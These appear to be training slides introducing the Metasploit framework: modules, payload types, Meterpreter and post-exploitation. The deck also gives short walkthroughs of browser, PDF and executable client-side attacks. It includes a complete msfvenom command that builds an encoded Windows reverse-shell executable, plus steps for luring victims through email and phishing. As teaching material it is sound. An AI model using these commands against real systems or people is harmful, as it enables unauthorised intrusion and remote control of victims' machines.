Metasploit

Module 1

By- Anurag Srivastava

AGENDA• Introduction to Metasploit• History of Metasploit• Exploit • Payloads• Auxiliary • Network Reconnaissance with Metasploit • Metasploit Payload• Meterpreter and Post Exploitation• Client-side Exploitation – Browser , pdf and exe • References

Introduction toMetasploit

• Vulnerability and exploitation framework designed to ease the burden on security professionals when it comes to performing security assessments.

• One of the single most useful auditing tools freely available to security professionals today

• Contains an extensive library of "modules.“• Each module has a function, and they are divided up into

"exploits", "auxiliary", "post" (post exploitation), "payloads", "encoders", and "nops.

History• Created by H. D. Moore in 2003 as a portable network tool using Perl

• In April, 2004 - With the help of Spoonm, HD released a total rewrite of the project, Metasploit 2.0 (19 exploits and 27 payloads).

• By 2007, the Metasploit Framework had been completely rewritten in Ruby

• On October 21, 2009, it had been acquired by Rapid7

Exploits• Vectors for Penetrating the systems .

• A software program that has been developed to attack an asset by taking advantage of a vulnerability.

• Objective of many exploits is to gain control over an asset .

Payloads• A payload in metasploit refers to an exploit module. 

• Each exploit can be attached with various payloads like reverse or bind shells, the meterpreter shell etc.

• A payload is a piece of code to be executed through said exploit.

Auxiliary• Metasploit Framework includes hundreds of

auxiliary modules that perform scanning, fuzzing, sniffing, and much more.

• Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.

Network Reconnaissance with

Metasploit• Foundation for any successful penetration test is solid reconnaissance .

• Gathering enough Information regarding the Target .

• Some examples of Reconnaissance is using nmap tool for port scanning and identifying services running on the target system .

Metasploit Payloads

• Mainly three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages.

• Singles -Self-Contained and Completely Standalone which can be something as simple as adding a user to the target system or running calc.exe.

• Stagers -Setup a network connection between the attacker and victim and are designed to be small and reliable

• Stages -payload components that are downloaded by Stagers modules. Stages provide advanced features with no size limits such as Meterpreter, VNC Injection, and the iPhone ‘ipwn’ Shell.

Meterpreter and Post Exploitation

• Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.

• Meterpreter communicates over the stager socket and provides a comprehensive client-side Ruby API.

• Post-Exploitation is done after the exploitation in-order to maintain the control of the compromised system for future use .

• Post-Exploitation includes setting up a backdoor to maintain more permanent system access and covering the tracks .

Client-side Exploitation

• Client side attacks require user-interaction such as enticing them to click a link, open a document, or somehow get to your malicious website.

• These types of attacks are often delivered by using cleverly worded emails, sometimes with attachments such as Microsoft Word and PDF documents.

• Often the attacks is used in conjunction with social engineering techniques by way of phishing or spear phishing attacks.

Browser Exploitation

• Browser Exploitation involves running a browser exploit inorder to take advantage of a flaw or vulnerability in an operating system or piece of software with the intent to breach browser security to alter a user's browser settings without their knowledge.

• Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.

In order to use this attack we have to open the metasploit framework and to use

the browser_autopwn module.

Set up the LHOST with your IP address,the SRVPORT with the port 80 (otherwise the link that we have to send to the user must me in

the format IP:8080) and the URIPATH with / in order to prevent metasploit to set up random URL’s.

Now we can share the link through our email to our client employees.If any user opens the malicious link,the autopwn module will try all these exploits in order to see if it can break into the client.If the browser is vulnerable to any of these exploits meterpreter sessions will open.

Pdf Exploitation• Exploiting a system using attacker’s crafted pdf file .• Mainly targets the system whose pdf reader is

vulnerable to some sort of attacks like buffer overflow .

• Pdf is distributed to the victims by social engineering techniques .

• Sometimes the pdf application fails to perform adequate boundary checks on user-supplied data then thus system can be attacked by using pdf exploitation technique .

We are going to be using the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer Overflow Vulnerability. 

Once we have all the options set the way we want, we run “exploit” to create our malicious file.

We will use msfconsole to set up our multi handler listener

Clicking the file opens Adobe but shows a greyed out window that never reveals a PDF. Instead, on the attackers machine a meterpreter session is opened and thus we have the shell on the victim system .

Exe Exploitation• Generate an executable from a Metasploit payload inorder

to target a victim through malicious executable file .• If you can get a user to run your payload for you, there is no

reason to go through the trouble of exploiting any software.• Generate a reverse shell payload, execute it on a remote

system, and get our shell. • Best way to do this is to backdoor an executable by

embedding it with malicious payloads .

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

use ‘multi/handler’ which is a stub that handles exploits launched outside of the framework.run ‘exploit’ for the multi/handler and execute our generated executable

on the victim.

The generated executable can be distributed using some sort of social engineering attacks thus as soon as the executable is executed on the victim system it presents the attacker with the shell of the victim system .

References• https://www.offensive-security.com/metasploit-

unleashed/• Mastering Metasploit by Nipun Jaswal . • http://hackeracademy.com/module/introduction-to-

pdf-attacks• https://pentestlab.wordpress.com• https://community.rapid7.com/community/metasploit